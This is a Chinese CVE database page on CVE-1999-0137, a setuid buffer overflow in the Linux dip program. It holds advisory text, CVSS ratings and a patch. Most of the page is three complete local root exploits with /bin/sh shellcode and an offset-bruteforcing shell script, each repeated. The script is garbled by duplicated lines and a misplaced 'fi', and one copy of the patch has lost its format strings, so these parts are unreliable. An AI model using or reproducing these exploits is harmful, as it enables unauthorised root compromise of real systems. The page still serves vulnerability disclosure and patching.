CVE-1999-0137
CVSS7.2
发布时间 :1996-07-09 00:00:00
修订时间 :2008-09-09 08:33:49
NMCOES    

[原文]The dip program on many Linux systems allows local users to gain root access via a buffer overflow.


[CNNVD]多厂商dip缓冲区溢出漏洞(CNNVD-199607-003)

        许多版本的Linux平台的dip程序存在漏洞。本地用户可以借助缓冲区溢出漏洞获取根访问权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0137
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0137
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199607-003
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

多厂商dip缓冲区溢出漏洞
高危 缓冲区溢出
1996-07-09 00:00:00 2005-05-02 00:00:00
本地  
        许多版本的Linux平台的dip程序存在漏洞。本地用户可以借助缓冲区溢出漏洞获取根访问权限。

- 公告与补丁

        Apply this patch:
        --- main.c Tue Feb 13 03:03:35 1996
        +++ main.c Mon May 4 23:36:49 1998
        @@ -189,7 +189,7 @@
         return;
         }
        - sprintf(buf, "/LCK..", _PATH_LOCKD, nam);
        + snprintf(buf, sizeof(buf), "/LCK..", _PATH_LOCKD, nam);
         fp = fopen(buf, "r");
         if (fp == (FILE *)0) {
        Or chmod -s dip.

- 漏洞信息 (19077)

Fred N. van Kempen dip 3.3.7 Buffer Overflow Vulnerability (1) (EDBID:19077)
linux local
1998-05-05 Verified
0 jamez
N/A [点击下载]
source: http://www.securityfocus.com/bid/86/info

A buffer overflow resides in 'dip-3.3.7o' and derived programs. This is a problem only on systems where 'dip' is installed setuid. The culpable code is an 'sprintf()' in line 192 in 'main.c': 

sprintf(buf, "%s/LCK..%s", _PATH_LOCKD, nam);

----- dip-exp.c ----- 
/* 
dip 3.3.7o buffer overflow exploit for Linux. (May 7, 1998) 
coded by jamez. e-mail: jamez@uground.org 

thanks to all ppl from uground. 

usage: 
gcc -o dip-exp dip3.3.7o-exp.c 
./dip-exp offset (-100 to 100. probably 0. tested on slack 3.4) 
*/ 


char shellcode[] = 

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 
"\x80\xe8\xdc\xff\xff\xff/bin/sh"; 


#define SIZE 130 
/* cause it's a little buffer, i wont use NOP's */ 

char buffer[SIZE]; 


unsigned long get_esp(void) { 
__asm__("movl %esp,%eax"); 
} 


void main(int argc, char * argv[]) 
{ 
int i = 0, 
offset = 0; 
long addr; 


if(argc > 1) offset = atoi(argv[1]); 

addr = get_esp() - offset - 0xcb; 

for(i = 0; i < strlen(shellcode); i++) 
buffer[i] = shellcode[i]; 

for (; i < SIZE; i += 4) 
{ 
buffer[i ] = addr & 0x000000ff; 
buffer[i+1] = (addr & 0x0000ff00) >> 8; 
buffer[i+2] = (addr & 0x00ff0000) >> 16; 
buffer[i+3] = (addr & 0xff000000) >> 24; 
} 

buffer[SIZE - 1] = 0; 

execl("/sbin/dip", "dip", "-k", "-l", buffer, (char *)0); 
} 
----- cut here ----- 

Another exploit: 

------------------------------ dipr.c ----------------------------- 

/* 
* dip-3.3.7o buffer overrun 07 May 1998 
* 
* sintax: ./dipr <offset> 
* 
* 
* offset: try increments of 50 between 1500 and 3000 
* 
* tested in linux with dip version 3.3.7o (slak 3.4). 
* 
* by zef and r00t @promisc.net 
* 
* http://www.promisc.net 
*/ 

#include <stdio.h> 
#include <stdlib.h> 

static inline getesp() 
{ 
__asm__(" movl %esp,%eax "); 
} 

main(int argc, char **argv) 
{ 
int jump,i,n; 
unsigned long xaddr; 
char *cmd[5], buf[4096]; 


char code[] = 
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 
"\x80\xe8\xdc\xff\xff\xff/bin/sh"; 

jump=atoi(argv[1]); 

for (i=0;i<68;i++) 
buf[i]=0x41; 

for (n=0,i=68;i<113;i++) 
buf[i]=code[n++]; 

xaddr=getesp()+jump; 

buf[i]=xaddr & 0xff; 
buf[i+1]=(xaddr >> 8) & 0xff; 
buf[i+2]=(xaddr >> 16) & 0xff; 
buf[i+3]=(xaddr >> 24) & 0xff; 

buf[i+4]=xaddr & 0xff; 
buf[i+5]=(xaddr >> 8) & 0xff; 
buf[i+6]=(xaddr >> 16) & 0xff; 
buf[i+6]=(xaddr >> 16) & 0xff; 
buf[i+7]=(xaddr >> 24) & 0xff; 

cmd[0]=malloc(17); 
strcpy(cmd[0],"/sbin/dip-3.3.7o"); 

cmd[1]=malloc(3); 
strcpy(cmd[1],"-k"); 

cmd[2]=malloc(3); 
strcpy(cmd[2],"-l"); 

cmd[3]=buf; 

cmd[4]=NULL; 

execve(cmd[0],cmd,NULL); 
} 

------------------------------- end ------------------------------- 


Shell script for easy testing :-) 


---------------------------- dipr.test ---------------------------- 

#/bin/bash 
if [ ! -x /sbin/dip-3.3.7o ] 
then 
echo "could not find file \"/sbin/dip-3.3.7o\""; 
exit -1 
fi 
if [ ! -u /sbin/dip-3.3.7o ] 
then 
echo "dip executable is not suid" 
exit -1 
fi 
if [ ! -x ./dipr ] 
then 
echo "could not find file \"./dipr\""; 
echo "try compiling dipr.c" 
exit -1 
fi 

x=2000 
false 
while [ $x -lt 3000 -a $? -ne 0 ] 
fi 
if [ ! -u /sbin/dip-3.3.7o ] 
then 
echo "dip executable is not suid" 
exit -1 
fi 
if [ ! -x ./dipr ] 
then 
echo "could not find file \"./dipr\""; 
echo "try compiling dipr.c" 
exit -1 
fi 

x=2000 
false 
while [ $x -lt 3000 -a $? -ne 0 ] 
do 
echo offset=$x 
x=$[x+50] 
./dipr $x 
done 
rm -f core 		

- 漏洞信息 (19078)

Fred N. van Kempen dip 3.3.7 Buffer Overflow Vulnerability (2) (EDBID:19078)
linux local
1998-05-05 Verified
0 pr10n
N/A [点击下载]
source: http://www.securityfocus.com/bid/86/info

A buffer overflow resides in 'dip-3.3.7o' and derived programs. This is a problem only on systems where 'dip' is installed setuid. The culpable code is an 'sprintf()' in line 192 in 'main.c': 

sprintf(buf, "%s/LCK..%s", _PATH_LOCKD, nam);

/* Linux x86 dip 3.3.7p exploit by pr10n */


#include <stdio.h>

#define NOP 0x90


/*thanks to hack.co.za*/
char shellcode[] =
          "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d"
          "\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3"
          "\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
          "\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";



unsigned long get_sp(void){ __asm__("movl %esp, %eax");}

main(int argc, char *argv[]){

char buf[136];
int i;
int offset=0,*ptr;
long ret;


if(argc!=2){
printf("usage: %s offset\n",argv[0]);
exit(0);}

offset=atoi(argv[1]);

ret=(get_sp()-offset);

for(i=1;i<136;i+=4){
*(long *)&buf[i]=ret;}

printf("\nusing: 0x%x\n\n",ret);

for(i=0;i<(sizeof(buf)-strlen(shellcode)-40);i++)
buf[i]=NOP;

memcpy(buf+i,shellcode,strlen(shellcode));

execl("/usr/sbin/dip","dip","-k","-l",buf,(char *)0);

}		

- 漏洞信息

900
Multiple Unix Vendor dip Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Workaround
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

1996-01-21 Unknow
1996-01-21 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this vulnerability. It is possible to temporarily work around the flaw by implementing the following workaround: chmod 755 /usr/sbin/dip.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Vendor dip Buffer Overflow Vulnerability
Boundary Condition Error 86
No Yes
1998-05-05 12:00:00 2007-07-09 08:57:00
This vulnerability was made public by Goran Gajic <ggajic@afrodita.rcub.bg.ac.yu> on Tuesday, May 5 1998, to the BugTraq mailing list.

- 受影响的程序版本

Fred N. van Kempen dip 3.3.7 o
+ Fred N. van Kempen dip 3.3.7 o-uri
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.3
+ S.u.S.E. Linux 6.2
+ Slackware Linux 3.4

- 漏洞讨论

A buffer overflow resides in 'dip-3.3.7o' and derived programs. This is a problem only on systems where 'dip' is installed setuid. The culpable code is an 'sprintf()' in line 192 in 'main.c':

sprintf(buf, "%s/LCK..%s", _PATH_LOCKD, nam);

- 漏洞利用

The following exploit code is available:

----- dip-exp.c -----
/*
dip 3.3.7o buffer overflow exploit for Linux. (May 7, 1998)
coded by jamez. e-mail: jamez@uground.org

thanks to all ppl from uground.

usage:
gcc -o dip-exp dip3.3.7o-exp.c
./dip-exp offset (-100 to 100. probably 0. tested on slack 3.4)
*/


char shellcode[] =

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";


#define SIZE 130
/* cause it's a little buffer, i wont use NOP's */

char buffer[SIZE];


unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}


void main(int argc, char * argv[])
{
int i = 0,
offset = 0;
long addr;


if(argc > 1) offset = atoi(argv[1]);

addr = get_esp() - offset - 0xcb;

for(i = 0; i < strlen(shellcode); i++)
buffer[i] = shellcode[i];

for (; i < SIZE; i += 4)
{
buffer[i ] = addr & 0x000000ff;
buffer[i+1] = (addr & 0x0000ff00) >> 8;
buffer[i+2] = (addr & 0x00ff0000) >> 16;
buffer[i+3] = (addr & 0xff000000) >> 24;
}

buffer[SIZE - 1] = 0;

execl("/sbin/dip", "dip", "-k", "-l", buffer, (char *)0);
}
----- cut here -----

Another exploit:

------------------------------ dipr.c -----------------------------

/*
* dip-3.3.7o buffer overrun 07 May 1998
*
* sintax: ./dipr <offset>
*
*
* offset: try increments of 50 between 1500 and 3000
*
* tested in linux with dip version 3.3.7o (slak 3.4).
*
* by zef and r00t @promisc.net
*
* http://www.promisc.net
*/

#include <stdio.h>
#include <stdlib.h>

static inline getesp()
{
__asm__(" movl %esp,%eax ");
}

main(int argc, char **argv)
{
int jump,i,n;
unsigned long xaddr;
char *cmd[5], buf[4096];


char code[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

jump=atoi(argv[1]);

for (i=0;i<68;i++)
buf[i]=0x41;

for (n=0,i=68;i<113;i++)
buf[i]=code[n++];

xaddr=getesp()+jump;

buf[i]=xaddr & 0xff;
buf[i+1]=(xaddr >> 8) & 0xff;
buf[i+2]=(xaddr >> 16) & 0xff;
buf[i+3]=(xaddr >> 24) & 0xff;

buf[i+4]=xaddr & 0xff;
buf[i+5]=(xaddr >> 8) & 0xff;
buf[i+6]=(xaddr >> 16) & 0xff;
buf[i+6]=(xaddr >> 16) & 0xff;
buf[i+7]=(xaddr >> 24) & 0xff;

cmd[0]=malloc(17);
strcpy(cmd[0],"/sbin/dip-3.3.7o");

cmd[1]=malloc(3);
strcpy(cmd[1],"-k");

cmd[2]=malloc(3);
strcpy(cmd[2],"-l");

cmd[3]=buf;

cmd[4]=NULL;

execve(cmd[0],cmd,NULL);
}

------------------------------- end -------------------------------


Shell script for easy testing :-)


---------------------------- dipr.test ----------------------------

#/bin/bash
if [ ! -x /sbin/dip-3.3.7o ]
then
echo "could not find file \"/sbin/dip-3.3.7o\"";
exit -1
fi
if [ ! -u /sbin/dip-3.3.7o ]
then
echo "dip executable is not suid"
exit -1
fi
if [ ! -x ./dipr ]
then
echo "could not find file \"./dipr\"";
echo "try compiling dipr.c"
exit -1
fi

x=2000
false
while [ $x -lt 3000 -a $? -ne 0 ]
fi
if [ ! -u /sbin/dip-3.3.7o ]
then
echo "dip executable is not suid"
exit -1
fi
if [ ! -x ./dipr ]
then
echo "could not find file \"./dipr\"";
echo "try compiling dipr.c"
exit -1
fi

x=2000
false
while [ $x -lt 3000 -a $? -ne 0 ]
do
echo offset=$x
x=$[x+50]
./dipr $x
done
rm -f core

------------------------------- end -------------------------------

- 解决方案

Apply this patch:

--- main.c Tue Feb 13 03:03:35 1996
+++ main.c Mon May 4 23:36:49 1998
@@ -189,7 +189,7 @@
return;
}

- sprintf(buf, "%s/LCK..%s", _PATH_LOCKD, nam);
+ snprintf(buf, sizeof(buf), "%s/LCK..%s", _PATH_LOCKD, nam);

fp = fopen(buf, "r");
if (fp == (FILE *)0) {

Or chmod -s dip.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站